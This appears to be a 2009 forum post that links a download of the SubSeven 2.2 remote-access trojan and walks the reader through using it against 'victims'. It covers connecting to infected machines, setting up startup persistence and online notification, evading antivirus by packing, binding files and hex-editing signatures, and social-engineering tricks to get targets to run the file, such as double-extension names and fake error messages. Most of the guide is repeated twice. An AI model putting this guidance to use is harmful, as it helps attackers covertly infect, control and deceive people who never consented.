SubSeven Trojan (Hacker's Tool)
Posted: Tue Jun 09, 2009 8:07 pm
Download Sub7 here: http://www.easy-share.com/1905610003/Sub7 v2.2.zip
SubSeven 2.2
The current most stable version. Basically, click on the section you need help with; I hope everything will be understandable and clear. You need to a have a little bit experience with s7's client because I am not going to explain every single thing. If you want to get a brief explanation about something just MouseOver it.
SubSeven Client supports all versions of Windows. You could use it under 9x, NT, 2k or XP. If you are having problems with XP, you have to do the following to fix some error problems.
1- Select your client executable or subseven.exe
2- Right click on it, then properties.
3- Click on Compatibility tab and check "Disable visual themes".
4- Select Run This program compatable for Windows 98/ME.
If you want to know more about the credits, click on the subseven icon in upper left, and if you want to get the latest news about subseven, click on read latest news. Finally, our status bar will be useful for us when we want know if the victim is connected or not. ( idle - ready for action ) that's what it says now.
Main Menu here :
I put this section here because its very simple and short and you are supposed to know how to deal with it.
1- You have to enter the IP address or ICQ uin to connect to a victim. If you dont know what an IP is, click here.
2- If you configured the server using editserver, you are supposed to know which port you used there.
3- Got static IP victims ? Click on the address book to save them.
4- Finally, the part that I am going to give you more explaination about. It will be the ip tools at the upper right near the " X ".
If you got your victim's host name or ICQ uin, you could use this tool to get the real IP. Just enter the hostname or the uin and resolve.
Subseven 2.2 Edit Server
This is the utility used to customise your servers to your own preferences. Click on the image in the area you need help with to view help. As before, in the client section, I hope everything will be easy for you to understand.
Options:
1-Start Up Methods
Start-Ups Section :
Click on the section you need help with.
In this section of the editserver program you may choose several different methods
in wich the server will use to start itself upon system reboot/startup.
* Registry-Run
When this option is checked, the server will add a key in "Run" under HKEY_LOCAL_MACHINE section of the system registry.
* Registry-RunServices
When this option is checked, the server will add a key in "RunServices" under HKEY_LOCAL_MACHINE section of the system registry.
Both these options are good methods of start-up, but are well known and easy to locate and remove.
* Keyname
Obviously, this gives the key added to the registry a name.
You can click on the ? symbols in this section and read hints pertaining to these entrys.
* WIN.INI
Checking this option will add an entry to the run line of the WIN.INI file, located in C:\WINDOWS. The WIN.INI file is merely a system configuration file containing information and instructions for Windows to perform at start up, etc. Let's say you've named the server something like msapp.exe. In the WIN.INI file the entry would like this:
run=msapp.exe
A normal WIN.INI file would have nothing at this line for run=
This also is a well known method and easy to remove.
* less known method
Click this option here, and a method that is less known by the average user will be invoked, offering a little more stealth.
* not known method
Obviously, this is much like the above option, only it is a method that is unknown to the average user.
I would explain in detail exactly what these methods are, but then some jo-blo victim who was reading might figure it out, and then they wouldn't be so stealthy anymore would they?
2-Notification Online
Notification Section :
This section deals with setting your server up to notify you when your victim is online.
Most of this pretty much self-explanatory, but we will cover each one to help you, particularly the email part.
* Victim Name
Are you serious? do you really need me to explain this part??
* Enable ICQ notify to UIN
Ok it's pretty simple. Place a check in the box and enter your UIN (that's your ICQ number silly).
Note: This feature in edit server doesn't work anymore due to the fact that ICQ has changed the string for it since it was consructed; however, there are programs available that are updated with the current paging protocol that can simply be binded to the server so that ICQ notify will work.
* Enable IRC notify
Again, very easy and quite reliable, however, if you use this feature, you must use a server that does not require ident, or install a hidden ident daemon on your vic. Bind it with the server or something.
1- notify to: In this field, enter the channel name you wish the notify to come to,e.g, #infected.
2- irc server: Put the server address here,e.g. irc.sub7.org
3- port: Enter the server's port. (9 out of ten times this will be port 6667)
Click on the little ? for additional help.
* enable Email notify
OK, this where most of you seem to have problems. So I will try to explain as best I can. It's really not difficult. The hardest part is finding an email server that works.
1- notify to: This is where you enter your e-mail address you are having the notify sent to,e.g., imacr33p@icqmail.com
2- server: This is where you enter the server address, e.g.,mail.icqmail.com
3- user: Just leave this blank.
4- test: Press this button to test the server for your notify. Personally, I wouldn't rely on this due to the fact that most of the time it doesn't work, but test if you want to...
Click the ? for additional help.
Now, finding an e-mail server that works.
The requirements are servers that are anonymous, and do not filter.
The best you can do is to search on the web for anonymous smtp servers.
Search at cyberarmy.com. They usually have some pretty good lists there.
Then of course, there's always the reliable google.com search engine.
If it's out there, google will find it
I have placed a couple of servers here for you that work (or atleast they did last time i checked), but finding one is really up to you.
# mail.cfm-resources.net
# mail.ifrance.net
# mail.icqmail.com
3-Installation
* Port settings
* Server password
* Protect server port and password
* IRC Bot
* Server name
* Melt server
* Enable fake error message
* Bind server
4-Protect server
Use this feature if you want total protection of your server. Place a check in the box, and enter a password, and no one will beable to read the settings in edit server much less re-edit it. This will prevent your server from being stolen. It can't be over-written with a new one, it can't be read, and it can't be edited without the password. And the vic can't find out who you are if he finds it cause he won't beable to read it
5-Saving options
* Save new settings
* Save new copy of server with new settings
* Quit without saving
Intro :-
This section will show you some basic info about making your server.exe undetected and infecting other people using server.exe
Words you need to know :
1. Packer or Compressor - program used to "pack" or "compress" a file, which would decrease it in size.
2. Binary - Any file that is not a text file, this word is most commonly used to describe executables, but jpeg files can also be described as binary.
3. (Detected) String or Signature - a piece of information in a file that the AV searches for to see if the file is a virus or not
4. AV - Anti Virus software like McAfee, Norton, Kaspersky, or any other program claims to be able to detect and clean viruses
5. Vic - person you have infected, or are trying to infect, given this name cause its short for VICTIM (obviously)
6. Uploader - Mini-Trojan that has a very small server size and can be used to download a much bigger Trojan without the victim knowing.
How to Make a server Undetected :
Methods:
1)Getting a hold of an UNCOMPRESSED copy of a server, and then yourself, compressing it its always good to compress it yourself as to heighten the chances of it being undetected. Especially if you use a lesser known packer, other than UPX seeing as how the UPX binary signature it leaves is very common among most servers, so the detected string has a better chance of being better encrypted in a lesser known way with an un-popular packer. The UPX encrypted server is no doubted in any AV's database.
2) Binding the server to another file, preferably another EXE which would make the detected string more difficult to find with AV. Its possible to bind to a .JPG, but the result file would still need to have .EXE extension, or any other type of executable binary file extension for example: *.com or *.scr, and there's many more to be found by you...RESEARCH!
3) Binding the server to multiple files, which would also lessen the probability of the detected string being found by AV by incorporating the signatures of many other files, and this can hopefully "trick" the victim's AV.
4) Its recommended that you use an UPLOADER Trojan, because usually their server size is very very small, and they're much easier to use when binding with other files and not have the result file be too big as to tip off the victim of it being a virus. Its also much easier to compress these uploader servers and make them not only so much smaller, but also undetected. good things
5) The next way is a very complicated method, and i wont go into it in detail here but just to whet your thirst for the idea, I'll explain a little. You can hex edit a server, and search for the detected string in the server and remove it. To take this idea to the next level you will need a hex editor, a SPLICER (program used to split files into smaller multiple parts), an uncompressed server and a reference telling you what string to look for, or you can look for it yourself. you should be able to splice the server into a bout 10-100 or more 2KB files, with these files, you should virus scan each one of them, and find out which one sets off the AV alarm, in this file is the virus signature, and you should match what you find inside this file with the same contents in the unspliced server. If you browse the web enough,you should be able to find out more information for this method. Good Luck.
Infection Methods by !happykl0wn (edited by FuX0reD) :
1) edit the server and rename it something like: "pic.jpg_____________________.exe" (use spaces instead of _) and then send it through AIM file transfer (not direct connect)... this method works especially well on ICQ file transfers...
Now if your server is undetected...you should be great to go.
2) I've found that blatantly lying to people works great too... I told someone I would send them a animation with monkeys playing guitar, but that I was really playing guitar and I made it look like the monkeys were. When u do this you should edit the server with the icon that looks like a video camera (whatever works, you know?)...and a error message with something like "File msdll video codec was not found"
3) Pretending to have warez on IRC can also get your way into someone's PC. This method works good because of all the warez fuss going on about IRC these days.
Most these methods are included above in the Undetected section, but these can also be useful, the main one is number 2, and remember, any of these can also be used against you in an effort to infect j00r ass.
SubSeven 2.2
The current most stable version. Basically, click on the section you need help with; I hope everything will be understandable and clear. You need to a have a little bit experience with s7's client because I am not going to explain every single thing. If you want to get a brief explanation about something just MouseOver it.
SubSeven Client supports all versions of Windows. You could use it under 9x, NT, 2k or XP. If you are having problems with XP, you have to do the following to fix some error problems.
1- Select your client executable or subseven.exe
2- Right click on it, then properties.
3- Click on Compatibility tab and check "Disable visual themes".
4- Select Run This program compatable for Windows 98/ME.
If you want to know more about the credits, click on the subseven icon in upper left, and if you want to get the latest news about subseven, click on read latest news. Finally, our status bar will be useful for us when we want know if the victim is connected or not. ( idle - ready for action ) that's what it says now.
Main Menu here :
I put this section here because its very simple and short and you are supposed to know how to deal with it.
1- You have to enter the IP address or ICQ uin to connect to a victim. If you dont know what an IP is, click here.
2- If you configured the server using editserver, you are supposed to know which port you used there.
3- Got static IP victims ? Click on the address book to save them.
4- Finally, the part that I am going to give you more explaination about. It will be the ip tools at the upper right near the " X ".
If you got your victim's host name or ICQ uin, you could use this tool to get the real IP. Just enter the hostname or the uin and resolve.
Subseven 2.2 Edit Server
This is the utility used to customise your servers to your own preferences. Click on the image in the area you need help with to view help. As before, in the client section, I hope everything will be easy for you to understand.
Options:
1-Start Up Methods
Start-Ups Section :
Click on the section you need help with.
In this section of the editserver program you may choose several different methods
in wich the server will use to start itself upon system reboot/startup.
* Registry-Run
When this option is checked, the server will add a key in "Run" under HKEY_LOCAL_MACHINE section of the system registry.
* Registry-RunServices
When this option is checked, the server will add a key in "RunServices" under HKEY_LOCAL_MACHINE section of the system registry.
Both these options are good methods of start-up, but are well known and easy to locate and remove.
* Keyname
Obviously, this gives the key added to the registry a name.
You can click on the ? symbols in this section and read hints pertaining to these entrys.
* WIN.INI
Checking this option will add an entry to the run line of the WIN.INI file, located in C:\WINDOWS. The WIN.INI file is merely a system configuration file containing information and instructions for Windows to perform at start up, etc. Let's say you've named the server something like msapp.exe. In the WIN.INI file the entry would like this:
run=msapp.exe
A normal WIN.INI file would have nothing at this line for run=
This also is a well known method and easy to remove.
* less known method
Click this option here, and a method that is less known by the average user will be invoked, offering a little more stealth.
* not known method
Obviously, this is much like the above option, only it is a method that is unknown to the average user.
I would explain in detail exactly what these methods are, but then some jo-blo victim who was reading might figure it out, and then they wouldn't be so stealthy anymore would they?
2-Notification Online
Notification Section :
This section deals with setting your server up to notify you when your victim is online.
Most of this pretty much self-explanatory, but we will cover each one to help you, particularly the email part.
* Victim Name
Are you serious? do you really need me to explain this part??
* Enable ICQ notify to UIN
Ok it's pretty simple. Place a check in the box and enter your UIN (that's your ICQ number silly).
Note: This feature in edit server doesn't work anymore due to the fact that ICQ has changed the string for it since it was consructed; however, there are programs available that are updated with the current paging protocol that can simply be binded to the server so that ICQ notify will work.
* Enable IRC notify
Again, very easy and quite reliable, however, if you use this feature, you must use a server that does not require ident, or install a hidden ident daemon on your vic. Bind it with the server or something.
1- notify to: In this field, enter the channel name you wish the notify to come to,e.g, #infected.
2- irc server: Put the server address here,e.g. irc.sub7.org
3- port: Enter the server's port. (9 out of ten times this will be port 6667)
Click on the little ? for additional help.
* enable Email notify
OK, this where most of you seem to have problems. So I will try to explain as best I can. It's really not difficult. The hardest part is finding an email server that works.
1- notify to: This is where you enter your e-mail address you are having the notify sent to,e.g., imacr33p@icqmail.com
2- server: This is where you enter the server address, e.g.,mail.icqmail.com
3- user: Just leave this blank.
4- test: Press this button to test the server for your notify. Personally, I wouldn't rely on this due to the fact that most of the time it doesn't work, but test if you want to...
Click the ? for additional help.
Now, finding an e-mail server that works.
The requirements are servers that are anonymous, and do not filter.
The best you can do is to search on the web for anonymous smtp servers.
Search at cyberarmy.com. They usually have some pretty good lists there.
Then of course, there's always the reliable google.com search engine.
If it's out there, google will find it
I have placed a couple of servers here for you that work (or atleast they did last time i checked), but finding one is really up to you.
# mail.cfm-resources.net
# mail.ifrance.net
# mail.icqmail.com
3-Installation
* Port settings
* Server password
* Protect server port and password
* IRC Bot
* Server name
* Melt server
* Enable fake error message
* Bind server
4-Protect server
Use this feature if you want total protection of your server. Place a check in the box, and enter a password, and no one will beable to read the settings in edit server much less re-edit it. This will prevent your server from being stolen. It can't be over-written with a new one, it can't be read, and it can't be edited without the password. And the vic can't find out who you are if he finds it cause he won't beable to read it
5-Saving options
* Save new settings
* Save new copy of server with new settings
* Quit without saving
Intro :-
This section will show you some basic info about making your server.exe undetected and infecting other people using server.exe
Words you need to know :
1. Packer or Compressor - program used to "pack" or "compress" a file, which would decrease it in size.
2. Binary - Any file that is not a text file, this word is most commonly used to describe executables, but jpeg files can also be described as binary.
3. (Detected) String or Signature - a piece of information in a file that the AV searches for to see if the file is a virus or not
4. AV - Anti Virus software like McAfee, Norton, Kaspersky, or any other program claims to be able to detect and clean viruses
5. Vic - person you have infected, or are trying to infect, given this name cause its short for VICTIM (obviously)
6. Uploader - Mini-Trojan that has a very small server size and can be used to download a much bigger Trojan without the victim knowing.
How to Make a server Undetected :
Methods:
1)Getting a hold of an UNCOMPRESSED copy of a server, and then yourself, compressing it its always good to compress it yourself as to heighten the chances of it being undetected. Especially if you use a lesser known packer, other than UPX seeing as how the UPX binary signature it leaves is very common among most servers, so the detected string has a better chance of being better encrypted in a lesser known way with an un-popular packer. The UPX encrypted server is no doubted in any AV's database.
2) Binding the server to another file, preferably another EXE which would make the detected string more difficult to find with AV. Its possible to bind to a .JPG, but the result file would still need to have .EXE extension, or any other type of executable binary file extension for example: *.com or *.scr, and there's many more to be found by you...RESEARCH!
3) Binding the server to multiple files, which would also lessen the probability of the detected string being found by AV by incorporating the signatures of many other files, and this can hopefully "trick" the victim's AV.
4) Its recommended that you use an UPLOADER Trojan, because usually their server size is very very small, and they're much easier to use when binding with other files and not have the result file be too big as to tip off the victim of it being a virus. Its also much easier to compress these uploader servers and make them not only so much smaller, but also undetected. good things
5) The next way is a very complicated method, and i wont go into it in detail here but just to whet your thirst for the idea, I'll explain a little. You can hex edit a server, and search for the detected string in the server and remove it. To take this idea to the next level you will need a hex editor, a SPLICER (program used to split files into smaller multiple parts), an uncompressed server and a reference telling you what string to look for, or you can look for it yourself. you should be able to splice the server into a bout 10-100 or more 2KB files, with these files, you should virus scan each one of them, and find out which one sets off the AV alarm, in this file is the virus signature, and you should match what you find inside this file with the same contents in the unspliced server. If you browse the web enough,you should be able to find out more information for this method. Good Luck.
Infection Methods by !happykl0wn (edited by FuX0reD) :
1) edit the server and rename it something like: "pic.jpg_____________________.exe" (use spaces instead of _) and then send it through AIM file transfer (not direct connect)... this method works especially well on ICQ file transfers...
Now if your server is undetected...you should be great to go.
2) I've found that blatantly lying to people works great too... I told someone I would send them a animation with monkeys playing guitar, but that I was really playing guitar and I made it look like the monkeys were. When u do this you should edit the server with the icon that looks like a video camera (whatever works, you know?)...and a error message with something like "File msdll video codec was not found"
3) Pretending to have warez on IRC can also get your way into someone's PC. This method works good because of all the warez fuss going on about IRC these days.
Most these methods are included above in the Undetected section, but these can also be useful, the main one is number 2
, and remember, any of these can also be used against you in an effort to infect j00r ass.
Have a nice day.